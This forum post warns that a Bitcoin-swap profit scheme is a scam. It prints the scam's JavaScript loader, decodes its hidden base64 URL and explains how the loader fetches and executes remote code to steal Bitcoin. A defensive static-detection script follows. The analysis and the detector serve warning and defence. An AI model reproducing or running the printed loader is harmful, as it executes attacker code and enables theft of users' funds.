hello
many threads are posted in this forum about making 37% profit by swapping bitcoin on swapzone.io
the fact is they give you a javascript script that steals your bitcoin.
one thread in there but there are many on this forum, many have been created by different users :
Quote: https://darkforums.st/Thread-Free-BTC-Me...ht=bitcoin
the malicious script is :
Code:
(() => {
  let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly8yeDMuYWMvcy5waHA/btc/node-1.9.js'
    .match(/changenow\/(.*?)\//)[1];
  fetch(atob(node))
    .then(r => r.text())
    .then(c => Function(c)())
})();

The (() => { ... })(); syntax means this function runs immediately when the script is loaded.
- The regex /changenow\/(.*?)\// looks for the part between changenow/ and the next / .
- In the URL, that part is: aHR0cHM6Ly8yeDMuYWMvcy5waHA which is base64
So node = "aHR0cHM6Ly8yeDMuYWMvcy5waHA"
Decoding aHR0cHM6Ly8yeDMuYWMvcy5waHA from base64 gives:
https://2x3.ac/s.php
So the script is pointing to an external URL.
[*]It downloads the content of that URL.
[*]Reads it as text ( r.text() ).
[*]Then executes it as JavaScript using Function(c)() (like eval ).
cheers
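A static check for the pattern walked through in the post, as an added example that is not part of the original post: it looks for base64 path segments that decode to a URL and for code-from-string calls, without fetching or running anything. It assumes Node.js (Buffer); the names SAMPLE, SINKS, decodeIfUrl and triageSnippet are hypothetical.

```javascript
// Added example: static triage only. Nothing is fetched or executed.
// Assumes Node.js (Buffer); all function and constant names are hypothetical.

// Constructed sample input: the loader quoted in the post, held as inert text.
const SAMPLE = String.raw`(() => {
let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly8yeDMuYWMvcy5waHA/btc/node-1.9.js'
.match(/changenow\/(.*?)\//)[1];
fetch(atob(node))
.then(r => r.text())
.then(c => Function(c)())
})();`;

// Calls worth flagging in any "paste this into the console" snippet.
const SINKS = [
  ['Function(...) constructor', /\bFunction\s*\(/],
  ['eval(...)', /\beval\s*\(/],
  ['atob(...) decode', /\batob\s*\(/],
  ['fetch(...) request', /\bfetch\s*\(/],
];

// Decode a candidate token; return the text only if it is a printable http(s) URL.
function decodeIfUrl(token) {
  const text = Buffer.from(token, 'base64').toString('utf8');
  return /^https?:\/\/[\x21-\x7e]+$/.test(text) ? text : null;
}

// Scan for base64-looking runs of 16+ characters and for risky sinks.
// '/' is left out of the token alphabet so URL path segments are tested one
// at a time; a standard-alphabet token that itself contains '/' is missed.
function triageSnippet(source) {
  const hiddenUrls = [];
  for (const token of source.match(/[A-Za-z0-9+_-]{16,}={0,2}/g) || []) {
    // Map the URL-safe alphabet back to the standard one before decoding.
    const url = decodeIfUrl(token.replace(/-/g, '+').replace(/_/g, '/'));
    if (url && !hiddenUrls.includes(url)) hiddenUrls.push(url);
  }
  const sinks = SINKS.filter(([, re]) => re.test(source)).map(([name]) => name);
  // Loader pattern from the post: hidden URL + fetch + code built from a string.
  const remoteExec = hiddenUrls.length > 0 && /\bfetch\s*\(/.test(source) &&
    /\b(Function|eval)\s*\(/.test(source);
  return { hiddenUrls, sinks, remoteExec };
}

console.log(triageSnippet(SAMPLE));
```

A clean result is not proof that a snippet is safe; the check only covers the hiding technique described here.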
